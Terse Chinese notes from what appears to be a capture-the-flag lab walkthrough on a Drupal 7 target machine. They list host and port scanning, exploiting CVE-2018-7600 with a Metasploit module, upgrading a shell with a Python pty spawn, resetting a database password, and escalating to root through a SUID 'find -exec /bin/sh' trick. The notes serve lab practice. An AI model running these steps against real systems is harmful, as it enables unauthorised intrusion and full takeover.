ip扫描
Netdisvocer

端口扫描
nmap -A

80端口 drupal 7 服务
111端口 rpcbind服务
入侵靶机
CVE-2018-7600 Drupal核心远程代码执行漏洞
CVE-2018-7602
https://github.com/pimps/CVE-2018-7600

反弹shell
使用Metasploit进行漏洞查找攻击
Msfconsole启动
search drupal
Use exploit/unix/webapp/drupal_drupalgeddon2
Show options
set rhost 192.168.17.137
Exploit
Shell

https://www.cnblogs.com/sparkdev/p/11605804.html
Pty伪终端
python -c 'import pty;pty.spawn("/bin/bash")' python -c 执行单行命令/脚本
将简单的Shell转换成为完全交互式的tty


Mysql -u dbuser -p



利用数据库update语句进行密码重置
php scripts/password-hash.sh password>password.txt


Suid提权
https://blog.csdn.net/qq_36119192/article/details/84872644
find / -type f -perm -u=s 2>/dev/null

发现find命令被设置为suid权限位
find / -type f -name getflag -exec "whoami" ;
find / -type f -name getflag -exec "/bin/sh" ;

关于flag4
https://www.jianshu.com/p/b659f4619c88
